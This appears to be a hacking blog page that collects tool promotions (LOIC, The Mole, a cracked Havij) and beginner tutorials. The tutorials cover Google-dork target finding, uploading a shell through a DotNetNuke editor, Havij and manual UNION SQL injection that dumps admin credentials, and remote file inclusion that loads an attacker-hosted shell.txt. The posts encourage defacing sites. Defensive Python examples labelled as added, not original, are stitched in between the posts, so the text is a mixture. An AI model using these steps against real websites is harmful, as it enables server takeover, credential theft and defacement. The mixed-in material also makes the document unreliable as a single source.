Showing posts with label Website Hacking. Show all posts

THE MOLE | AUTOMATIC SQL INJECTION TOOL | SQLI EXPLOITATION

 
The Mole is an automatic SQL injection exploitation tool. Given only a vulnerable URL and a valid string on the site, it can detect the type of injection and exploit it, using either the union technique or a boolean query based technique.
 
Features
  • Command line interface. Different commands trigger different actions.
  • Support for injections using MySQL, SQL Server, Postgres and Oracle databases.
  • Support for query filters, in order to bypass certain IPS/IDS rules using generic filters, and the possibility of creating new ones easily.
  • Developed in Python 3.
  • Auto-completion for commands, command arguments and database, table and column names.

LOIC (Low Orbit Ion Cannon) | DOS | DDOS TOOL

LOIC (Low Orbit Ion Cannon), named after a fictional weapon in the Command & Conquer series of video games, is an open source network stress testing application written in C#. LOIC performs a denial-of-service (DoS) attack or, when used by multiple individuals, a DDoS (Distributed Denial of Service) attack on a target site by flooding the server with TCP, UDP or HTTP packets with the intention of disrupting the service of a particular host. People have used LOIC to join voluntary botnets.

Note that I shall NOT be held responsible for your actions undertaken with the help of this tool.

WARNING: This is a very deadly tool, so please read this site's disclaimer before using it. And DO NOT attack from your computer because once you are traced? Only hell knows you are on your own, use it wisely :P:P:P


HACK WEBSITE USING DotNetNuke (DNN) | PORTAL HACKING


Portal Hacking (DNN) is a type of website hacking technique that uses Google to search for vulnerable or hackable DNN sites. This is done with the help of Google dorks. That is why it is said that Google is one of the cyber elements that make a hacker's job easier.

How to hack using (DNN)

  • In the google search box, type the following dork;

:inurl:/tabid/36/language/en-US/Default.aspx

The above dork is simply used to search for a vulnerable DNN site. See the image below;

  • Now let's say that we have found a vulnerable site like this (just an example):

www.site.com/Home/tabid/36/Lan...S/Default.aspx

 All you have to do is modify the vulnerable url by replacing;

/Home/tabid/36/Lan...S/Default.aspx

with this;

/Providers/HtmlEditorProviders/Fck/fcklinkgallery.aspx 

So that you will have something that looks like this;

www.site.com/Providers/HtmlEditorProviders/Fck/fcklinkgallery.aspx


  • Now enter the modified URL in the address bar and hit Enter! You will get the link gallery.

  • Now on the "link type" menu select "File", then replace the URL in your browser's address bar with the following script and hit Enter!
  javascript:__doPostBack('ctlURL$cmdUpload','')

An "upload" option should appear on the link gallery menu as shown below;

  • Now upload your shell (c99, c100, r57, etc.) and it's game over!!!
Shells are malicious PHP files which you upload to a website; once you execute one, you get access to its server directly WITHOUT authenticating yourself. With the help of a shell you can easily remove/edit/replace files, in short taking over the server as if you were the admin :P

    HOW TO HACK A WEBSITE BY SQL INJECTION USING HAVIJ | TUTORIAL

    You can download Havij here

    After downloading and installing the Havij SQL tool, you have to find an SQL vulnerable site. This can be done by the use of Google dorks like
    • inurl:index.php?id=
    Read the tutorial on manual SQL injection, under "Searching for the vulnerability", here ...

    But for an easy go, you can just use another automated program known as SQL Poison. You can download it here. The main aim of the SQL Poison scanner is to help you find a vulnerable web page by performing an automated blind search on a search engine like Google. Havij will only hack a website through a specific web page which you know is vulnerable to SQL injection.

    -----------------------------------------------------------------------------------------------------------------

    Now let's say that you have found a vulnerable URL which looks like this one:
    • http://www.hackyourdad.com/hisoffice.php?id=282
    1. Open Havij, then copy and paste the vulnerable URL as shown in the figure



    2. Now click the "Analyze" button



    4. After you click Analyze, wait for it to find that the site is vulnerable, the type of injection, and whether the DB server is MySQL; it will also find the database name, which looks like xxxx_xxxx


    5. Then go to the next operation of finding tables by clicking "tables". A sub menu will appear where you will click "Get tables" as shown in the figure below. You may need to wait for a while before it shows you the tables



    6. After you get the tables, there will be a check box for "users". Put a mark on it and click on the "get columns" tab as shown in the figure


    7. Under the "Get columns" list, just check username and password and click on "Get data"

    8. Bingo!!! Now you have the username and password that may be for the admin... The pass that you will get will be in the form of an MD5 hash, which you will have to decrypt by using the MD5 decryptor tool as shown below

    After you have got the username and the password ready, you now need to find the admin page which will give you access to the control panel (cpanel) of the website.
    To find the admin page, go to "Find Admin", then enter the site URL in "Path to search" and click on "Start" as shown in the image below

    Now get the admin page URL and open it in your internet browser. It will take you to a page which will request the username and password. Enter these details & it's Game Over!!!
    You will find yourself in the control panel (cpanel) where you will have complete control of the website, you can do whatever the hell you want, you can even deface the website if you are really in a bad mood :P


    HACKING EXTENSION FOR FIREFOX (XSS Me)


    Cross-Site Scripting (XSS) is a common flaw found in today's web applications. XSS flaws can cause serious damage to a web application. Detecting XSS vulnerabilities early in the development process will help protect a web application from unnecessary flaws. XSS-Me is the Exploit-Me tool used to test for reflected XSS vulnerabilities.





    HAVIJ SQL INJECTION TOOL | FULL VERSION CRACK

    Havij is an automated SQL Injection tool that helps penetration testers to search and find SQL vulnerabilities on a web page.

    By taking advantage of an SQL vulnerable web application, a user can use this software to fingerprint the back-end database, retrieve DBMS users and password hashes, dump tables and columns, fetch data from the database, run SQL statements and even access the underlying file system and execute commands on the operating system.

    Compared to other SQL vulnerability scanners, Havij has a 95% success rate and has a very friendly user interface which makes it easier for every noob hacker to use.



     What's New?
    • Oracle error based database added with ability to execute query.
    • Getting tables and columns when database name is unknown added (MySQL).
    • Another method added for finding columns count and string column in PostgreSQL.
    • Automatic keyword finder optimized and some bugs fixed.
    • A bug in finding valid string column in MySQL fixed.
    • 'Key is not unique' bug fixed.
    • Getting data starts from row 2 when All in One fails - bug fixed.
    • Run time error when finding keyword fixed.
    • False table finding in Access fixed.
    • Keyword correction method made better.
    • A bug in getting current database in MSSQL fixed.
    • A secondary method added when input value doesn't return a normal page (usually 404 not found).
    • Data extraction bug in HTML-encoded pages fixed.
    • String or integer type detection made better.
    • A bug in HTTPS injection fixed.
    You can go through the Tutorial of SQL injection with Havij from Here


    LIST OF GOOGLE DORKS FOR SQL INJECTION



    DOWNLOAD LFI SCANNER SCRIPT

    This is a simple Local File Inclusion vulnerability scanner that helps you find LFI vulnerabilities.
    This tool is only able to handle "simple" LFI vulnerabilities and not complex ones.

    Usage:
    ./lfi_scanner.py --url=


    Usage example:
    ./lfi_scanner.py --url="http://www.example.com/page.php?file=mai




    HOW TO HACK A WEBSITE BY ''REMOTE FILE INCLUSION'' (RFI)

    Remote File Inclusion (RFI) allows an attacker to upload his file on a website server using a script. RFI is a common vulnerability found in many websites. Using RFI you can literally deface a website and get complete access to the server. In this tutorial, I'll try to make it as simple as possible.. (Noob Friendly)

    1. Searching for RFI vulnerability


    The vulnerability is usually found in websites that have a URL navigation that is similar to;

    • www.victimwebsite.com/index.php?page=something

    This can be found by the use of google dorks.. e.g inurl:index.php?page=

    2. Testing for RFI vulnerability

    After targeting a website, you need to make sure that it's really vulnerable to this type of attack by testing using:

    • www.victimwebsite.com/index.php?page=http://www.google.com/?

    Press Enter, and if the Google home page appears instead of the victim's website, then it is vulnerable to RFI

    3. Gaining Access to the server

    Now you need to execute your own script on the victim's web server with the help of a shell. Shells are scripts that allow a hacker to view the directories of a server, view files, delete files and run commands.

    DOWNLOAD SHELL: http://www.mediafire.com/file/d6jafoo2iafsaj4/shell.php

    Now upload the shell to any web host (hacker's website) and get the URL of that
    e.g    www.hackerwebsite.com/shell.txt

    You need to upload the shell as a text file (shell.txt) instead of shell.php. The reason is that if you upload it as "shell.php", it's going to execute on the hacker's website instead of the victim's website, get my point?

    Now you need to hook up your victim's server to your shell by replacing the Google URL with your shell URL so that it looks like this;

     www.victimwebsite.com/index.php?page=http://hackerwebsite.com/shell.txt

    Hit Enter!!! and it's game over.... you have complete access to the victim's server and you can do anything with it... :P
    The above image shows what your shell window would look like after you have successfully hacked into a website.
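
Seen from the server side, both the RFI test above (a `page` value that is itself an absolute URL) and the DNN link-gallery request from the earlier post leave a recognisable request line in the access log. The following is an added example, not code from the original post: the function names, finding labels and sample request lines are constructed for illustration, and `example.test` is a placeholder host.

```python
import re
from urllib.parse import parse_qsl, unquote, urlsplit

# Path named in the DNN post. Windows/IIS paths are case-insensitive, so compare lower-cased.
DNN_GALLERY_PATH = "/providers/htmleditorproviders/fck/fcklinkgallery.aspx"

# A parameter value that is itself an absolute URL, as in the RFI test above.
URL_VALUE = re.compile(r"^\s*(?:https?|ftp)://", re.IGNORECASE)


def fully_unquote(value, max_rounds=3):
    """Percent-decode repeatedly so double-encoded values are still seen."""
    for _ in range(max_rounds):
        decoded = unquote(value)
        if decoded == value:
            break
        value = decoded
    return value


def classify(request_line):
    """Return the findings for one 'METHOD target HTTP/x.y' request line."""
    parts = request_line.strip().split(" ")
    if len(parts) < 3:
        return ["malformed-request-line"]
    # Re-join the middle so a target containing raw spaces is still inspected.
    target = " ".join(parts[1:-1])
    split = urlsplit(target)
    findings = []
    if fully_unquote(split.path).lower().rstrip("/") == DNN_GALLERY_PATH:
        findings.append("dnn-link-gallery")
    # parse_qsl decodes once; fully_unquote catches further encoding layers.
    for name, value in parse_qsl(split.query, keep_blank_values=True):
        if URL_VALUE.match(fully_unquote(value)):
            findings.append("url-in-param:" + name)
    return findings


def scan(request_lines):
    """Map each suspicious request line to its findings; clean lines are omitted."""
    report = {}
    for line in request_lines:
        findings = classify(line)
        if findings:
            report[line] = findings
    return report


# Constructed sample request lines (not real traffic).
SAMPLE_REQUESTS = [
    "GET /index.php?page=contact HTTP/1.1",
    "GET /index.php?page=http://www.google.com/? HTTP/1.1",
    "GET /index.php?page=http%253A%252F%252Fexample.test%252Fa.txt HTTP/1.1",
    "GET /Providers/HtmlEditorProviders/Fck/fcklinkgallery.aspx HTTP/1.1",
    "GET /providers/htmleditorproviders/fck/FckLinkGallery.aspx?x=1 HTTP/1.1",
    "GET /login.aspx?returnurl=%2Fhome HTTP/1.1",
]

if __name__ == "__main__":
    for line, findings in scan(SAMPLE_REQUESTS).items():
        print(findings, line)
```

Parameters that legitimately carry absolute URLs (redirect targets, for instance) will also match `url-in-param`, so the rule needs a per-application list of parameters where that is expected.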



    DENIAL OF SERVICE (DOS Attacks)


    A denial of service (DoS) attack is a type of hacker attack that clogs up so much memory on the target system that it cannot serve its users, or it causes the target system to crash, reboot, or otherwise deny services to legitimate users. There are several different kinds of DoS attacks as discussed below:


    1. Ping Of Death : The ping of death attack sends oversized ICMP datagrams (encapsulated in IP packets) to the victim. The ping command makes use of the ICMP echo request and echo reply messages and is commonly used to determine whether the remote host is alive. In a ping of death attack, however, ping causes the remote system to hang, reboot or crash. To do so, the attacker uses the ping command in conjunction with the -l argument (used to specify the size of the packet sent) to ping the target system with a packet that exceeds the maximum bytes allowed by TCP/IP (65,536).
    example:- c:/>ping -l 65540 hostname
    Fortunately, nearly all operating systems these days are not vulnerable to the ping of death attack.

    2. Teardrop Attack : Whenever data is sent over the internet, it is broken into fragments at the source system and reassembled at the destination system. For example, suppose you need to send 3,000 bytes of data from one system to another. Rather than sending the entire chunk in a single packet, the data is broken down into smaller packets as given below:

    • packet 1 will carry bytes 1-1000.
    • packet 2 will carry bytes 1001-2000.
    • packet 3 will carry bytes 2001-3000.
    In a teardrop attack, however, the data packets sent to the target computer contain bytes that overlap with each other.
    (bytes 1-1500) (bytes 1001-2000) (bytes 1500-2500)
    When the target system receives such a series of packets, it can not reassemble the data and therefore will crash, hang, or reboot.
    Old Linux systems, Windows NT/95 are vulnerable.

    3. SYN - Flood Attack : In a SYN flooding attack, several SYN packets are sent to the target host, all with an invalid source IP address. When the target system receives these SYN packets, it tries to respond to each one with a SYN/ACK packet, but as all the source IP addresses are invalid the target system goes into a wait state for the ACK message from the source. Eventually, due to the large number of connection requests, the target system's memory is consumed. In order to actually affect the target system, a large number of SYN packets with invalid IP addresses must be sent.

    4. Land Attack : A land attack is similar to a SYN attack, the only difference being that instead of including an invalid IP address, the SYN packet includes the IP address of the target system itself. As a result an infinite loop is created within the target system, which ultimately hangs and crashes. Windows NT before Service Pack 4 is vulnerable to this attack.

    5. Smurf Attack : There are 3 players in the smurf attack: the attacker, the intermediary (which can also be a victim) and the victim. In most scenarios the attacker spoofs the IP source address as the IP of the intended victim to the intermediary network broadcast address. Every host on the intermediary network replies, flooding the victim and the intermediary network with network traffic.
    Result: Performance may be degraded such that the victim and intermediary networks become congested and unusable, i.e. clogging the network and preventing legitimate users from obtaining network services.

    6. UDP - Flood Attack : Two UDP services, echo (which echoes back any character received) and chargen (which generates characters), were used in the past for network testing and are enabled by default on most systems. These services can be used to launch a DoS by connecting the chargen to echo ports on the same or another machine and generating large amounts of network traffic.
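
The teardrop description above comes down to one check a reassembler has to make: validate every fragment range before copying any bytes. The following is an added example, not code from the original post, that runs that check on the two fragment layouts from the text. It assumes the text's 1-based inclusive byte ranges (real IP headers carry offsets in 8-byte units), and the function names and payload are constructed for illustration.

```python
class FragmentError(ValueError):
    """Raised when a fragment set must be discarded instead of reassembled."""


def reassemble(fragments, total_len):
    """Rebuild a datagram from (first, last, data) fragments.

    Byte positions are 1-based and inclusive, matching the ranges in the text.
    Overlaps, gaps and out-of-range fragments raise FragmentError; nothing is
    copied into the buffer until the whole set has been validated.
    """
    ordered = sorted(fragments, key=lambda f: (f[0], f[1]))
    expected = 1  # next byte position that still has to be supplied
    for first, last, data in ordered:
        if first < 1 or last < first or last > total_len:
            raise FragmentError(f"fragment {first}-{last} is outside 1-{total_len}")
        if len(data) != last - first + 1:
            raise FragmentError(f"fragment {first}-{last} carries {len(data)} bytes")
        if first < expected:
            raise FragmentError(f"fragment {first}-{last} overlaps bytes up to {expected - 1}")
        if first > expected:
            raise FragmentError(f"bytes {expected}-{first - 1} are missing")
        expected = last + 1
    if expected != total_len + 1:
        raise FragmentError(f"bytes {expected}-{total_len} are missing")
    buf = bytearray(total_len)
    for first, last, data in ordered:
        buf[first - 1:last] = data
    return bytes(buf)


def cut(payload, ranges):
    """Build constructed test fragments by slicing payload at the given ranges."""
    return [(first, last, payload[first - 1:last]) for first, last in ranges]


def verdict(fragments, total_len):
    """Return 'ok' or the reason the fragment set was discarded."""
    try:
        reassemble(fragments, total_len)
        return "ok"
    except FragmentError as exc:
        return str(exc)


# Constructed 3,000-byte payload and the two fragment layouts from the text.
PAYLOAD = bytes(i % 251 for i in range(3000))
NORMAL = cut(PAYLOAD, [(1, 1000), (1001, 2000), (2001, 3000)])
TEARDROP = cut(PAYLOAD, [(1, 1500), (1001, 2000), (1500, 2500)])

if __name__ == "__main__":
    print("normal:  ", verdict(NORMAL, 3000))
    print("teardrop:", verdict(TEARDROP, 3000))
```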

    WEBSITE HACKING USING SQL INJECTION (Manually)


    SECTION 1 - Searching for the vulnerability

    inurl:buy.php?id=

    This will be inputted into a search engine and because of the "inurl:" part of the dork, the search engine will return results with URLs that contain the same characters. Some of the sites that have this dork on their website may be vulnerable to SQL injection.

    Now let's say we found the page that looks like this

    http://www.site.com/buy.php?id=1

    In order to test this site all we need to do is add a ' either in between the "=" sign and the "1" or after the "1" so it looks like this:

    http://www.site.com/buy.php?id=1'
    or
    http://www.site.com/buy.php?id='1

    After pressing enter, if this website should return an error such as the following:


    • Warning: mysql_fetch_array(): supplied argument is not a valid MySQL result resource in /home1/michafj0/public_html/gallery.php on line 7
    Or something along those lines, this means it's vulnerable to injection.

    In some cases you may find a website such as this:

    http://www.site.com/buy.php?id=1&catid=2

    Then you must use the same technique with adding a ' except it must be between the value (in this case the number) and the operator (the "=" sign) so it looks like this:

    http://www.site.com/buy.php?id='1&catid='2

    There are programs that will do this for you but to start off I would suggest simply to do things manually, using Google, and so I won't post any for you guys. If you feel so compelled to use one anyways, I recommend the Exploit Scanner by Reiluke.

    SECTION 2 - Determining the amount of columns

    In order for us to be able to use commands and get results we must know how many columns there are on a website. So to find the number of columns we must use a very complex and advanced method that I like to call "Trial and Error" with the ORDER BY command

    • NOTE: SQL does not care whether or not your letters are capitalized; I'm just doing it for clarity. For all it cares, your queries could look like this:
    http://www.site.com/buy.php?id=-1 CaN I HaZ TeH PaSSwOrDs? PLz aNd ThX

    IT DOESN'T MATTER (btw please don't think that was an actual command).

    So back to the ORDER BY command. To find the number of columns we write a query with incrementing values until we get an error, like this:

    http://www.site.com/buy.php?id=1 ORDER BY 1-- <---No error
    http://www.site.com/buy.php?id=1 ORDER BY 2-- <---No error
    http://www.site.com/buy.php?id=1 ORDER BY 3-- <---No error
    http://www.site.com/buy.php?id=1 ORDER BY 4-- <---No error
    http://www.site.com/buy.php?id=1 ORDER BY 5-- <---ERROR!

    This means that there are FOUR columns!

    DON'T FORGET TO INCLUDE THE DOUBLE NULL (--) AFTER THE QUERY.
    VERY IMPORTANT!

    SECTION 3 - Finding which columns are vulnerable

    So we know that there are four columns; now we have to find out which ones are vulnerable to injection. To do this we use the UNION and SELECT queries while keeping the double null (--) at the end of the string. There is also one other difference that is small in size but not in importance, see if you can spot it.

    http://www.site.com/buy.php?id=-1 UNION SELECT 1,2,3,4--

    If you couldn't spot the difference, it's the extra null in between the "=" sign and the value (the number). buy.php?id=-1

    Now after entering that query you should be able to see some numbers somewhere on the page that seem out of place. Those are the numbers of the columns that are vulnerable to injection. We can use those columns to pull information from the database which we will see in Part Two.

    Part Two - Gathering Information

    In this part we will discover how to find the name of the database and what version of SQL the website is using by using queries to exploit the site.

    Determining the SQL version.
    Finding the version of the SQL of the website is a very important step because the steps you take for version 4 are quite different from version 5 in order to get what you want. In this tutorial, I will not be covering version 4 because it really is a guessing game and for the kind of sites that are still using it, it's not worth your time.

    If we look back to the end of Section Three in Part One we saw how to find the vulnerable columns. Using that information we can put together our next query (I will be using column 2). The command should look like this:

    http://www.site.com/buy.php?id=-1 UNION SELECT 1,@@version,3,4--

    Because 2 is the vulnerable column, this is where we will place "@@version". Another string that could replace "@@version" is "version()".

    If the website still does not display the version try using unhex(hex()) which looks like this:

    http://www.site.com/buy.php?id=-1 UNION SELECT 1,unhex(hex(@@version)),3,4--

    • NOTE: If this method must be used here, it must be used for the rest of the injection as well.

    Now what you want to see is something along these lines: 5.1.47-community-log which is the version of SQL for the website.

    • NOTE: If you see version 4 and you would like to have a go at it, there are other tutorials that explain how to inject into it.

    Finding the database
    Finding the name of the database is not always a necessary step to take to gather the information that you want, however in my experience following these steps and finding the database may sometimes lead to a higher success rate.

    To find the database we use a query like the one below:

    http://www.site.com/buy.php?id=-1 UNION SELECT 1,group_concat(schema_name),3,4 from information_schema.schemata--

    This could sometimes return more results than necessary and so that is when we switch over to this query instead:

    http://www.site.com/buy.php?id=-1 UNION SELECT 1,concat(database()),3,4--

    Well done, hacker! You now have the name of the database! Copy and paste the name somewhere safe, we'll need it for later.

    The Good Stuff
    This is the fun part where we will find the usernames, emails and passwords!

    • Finding the table names
    To find the table names we use a query that is similar to the one used for finding the database with a little bit extra added on:

    http://www.site.com/buy.php?id=-1 UNION SELECT 1,group_concat(table_name),3,4 FROM information_schema.tables WHERE table_schema=database()--

    It may look long and confusing but once you understand it, it really isn't so I'll try to explain. What this query does is it "groups" (group_concat) the "table names" (table_name) together and gathers that information "from" (FROM) information_schema.tables where the "table schema" (table_schema) can be found in the "database" (database()).

    NOTE: While using group_concat you will only be able to see 1024 characters worth of tables so if you notice that a table is cut off on the end switch over to limit which I will explain now.

    http://www.site.com/buy.php?id=-1 UNION SELECT 1,table_name,3,4 FROM information_schema.tables WHERE table_schema=database() LIMIT 0,1--

    What this does is it shows the first and only the first table. So if we were to run out of characters on let's say the 31st table we could use this query:

    http://www.site.com/buy.php?id=-1 UNION SELECT 1,table_name,3,4 FROM information_schema.tables WHERE table_schema=database() LIMIT 30,1--

    Notice how my limit was 30,1 instead of 31,1? This is because when using limit it starts from 0,1, which means that the 30th is actually the 31st.

    You now have all the table names!

    Finding the column names
    Now that you have all of the table names try and pick out the one that you think would contain the juicy information. Usually they're tables like User(s), Admin(s), tblUser(s) and so on but it varies between sites.

    After deciding which table you think contains the information, use this query (in my example, I'll be using the table name "Admin"):

    http://www.site.com/buy.php?id=-1 UNION SELECT 1,group_concat(column_name),3,4 FROM information_schema.columns WHERE table_name="Admin"--

    This will either give you a list of all the columns within the table or give you an error but don't panic if it is outcome #2! All this means is that Magic Quotes is turned on. This can be bypassed by using a hex or char converter (they both work) to convert the normal text into char or hex (a link to a website that does this will be included at the end of the tutorial).

    UPDATE: If you get an error at this point all you must do is follow these steps:

    1. Copy the name of the table that you are trying to access.
    2. Paste the name of the table into this website where it says "Say Hello To My Little Friend".
        Hex/Char Converter


    3. Click convert.
    4. Copy the string of numbers/letters under Hex into your query so it looks like this:

    http://www.site.com/buy.php?id=-1 UNION SELECT 1,group_concat(column_name),3,4 FROM information_schema.columns WHERE table_name=0x41646d696e--

    Notice how before I pasted the hex I added a "0x"; all this does is tell the server that the following characters are part of a hex string.

    You should now see a list of all the columns within the table such as username, password, and email.

    NOTE: Using the limit function does work with columns as well.

    Displaying the column contents
    We're almost done! All we have left to do is to see what's inside those columns and use the information to login! To view the columns we need to decide which ones we want to see and then use this query (in this example I want to view the columns "username", "password", and "email", and my database name will be "db123"). This is where the database name comes in handy:

    http://www.site.com/buy.php?id=-1 UNION SELECT 1,group_concat(username,0x3a,password,0x3a,email),3,4 FROM db123.Admin--

    In this query, 0x3a is the hex value of a colon (:) which will group the username:password:email for the individual users just like that.

    FINALLY! Now you have the login information for the users of the site, including the admin. All you have to do now is find the admin login page which brings us to the last section

    Finding the admin page
    Usually the admin page will be directly off of the site's home page, here are some examples:

    http://www.site.com/admin
    http://www.site.com/adminlogin
    http://www.site.com/modlogin
    http://www.site.com/moderator

    Once again there are programs that will find the page for you but first try some of the basic guesses, it might save you a couple of clicks. If you do use a program Reiluke has coded one for that as well. Search Admin Finder by Reiluke.

    And that concludes my tutorial! I hope it was helpful to some of you. Remember to keep practicing and eventually you'll have all of the queries memorized in no time!
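
Every probe in this tutorial and in the Havij walkthrough relies on the `id` value being pasted into the SQL text. The following is an added example, not code from the original post: it shows that handler next to a hardened one and runs the tutorial's `id` values through both. SQLite stands in for the site's MySQL database, and the `products` table, its rows and the function names are assumptions made for illustration.

```python
import re
import sqlite3


def make_db():
    """In-memory stand-in for the site's database (constructed sample rows)."""
    db = sqlite3.connect(":memory:")
    db.execute(
        "CREATE TABLE products (id INTEGER PRIMARY KEY, name TEXT, price TEXT, descr TEXT)"
    )
    db.executemany(
        "INSERT INTO products VALUES (?, ?, ?, ?)",
        [(1, "lamp", "10.00", "desk lamp"), (2, "mug", "4.50", "blue mug")],
    )
    return db


def lookup_vulnerable(db, raw_id):
    """'Before': the request value becomes part of the SQL text."""
    sql = "SELECT id, name, price, descr FROM products WHERE id=" + raw_id
    return db.execute(sql).fetchall()


ID_PATTERN = re.compile(r"[0-9]{1,9}")


def lookup_hardened(db, raw_id):
    """'After': validate the type, then bind the value as a parameter."""
    if not ID_PATTERN.fullmatch(raw_id):
        raise ValueError("id must be a plain integer")
    sql = "SELECT id, name, price, descr FROM products WHERE id=?"
    return db.execute(sql, (int(raw_id),)).fetchall()


def outcome(lookup, db, raw_id):
    """Summarise what the handler did: rows returned, SQL error, or rejected."""
    try:
        return ("rows", lookup(db, raw_id))
    except sqlite3.Error:
        # With error display enabled this is what surfaces as an on-page warning.
        return ("sql-error", None)
    except ValueError:
        return ("rejected", None)


# id values taken from the tutorial's URLs.
PAGE_INPUTS = [
    "1",
    "1'",
    "1 ORDER BY 4--",
    "1 ORDER BY 5--",
    "-1 UNION SELECT 1,2,3,4--",
]


def compare(db):
    """Run every input through both handlers and return the outcome kinds."""
    return {
        raw: (
            outcome(lookup_vulnerable, db, raw)[0],
            outcome(lookup_hardened, db, raw)[0],
        )
        for raw in PAGE_INPUTS
    }


if __name__ == "__main__":
    for raw, kinds in compare(make_db()).items():
        print(f"{raw!r:32} vulnerable={kinds[0]:10} hardened={kinds[1]}")
```

In the hardened handler the value never reaches the SQL parser as text, so the quote, ORDER BY and UNION inputs are refused before any query runs and no database error is produced for a page to display.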

    Copyright © 2011. Ethical Hacking Unleashed . All Rights Reserved.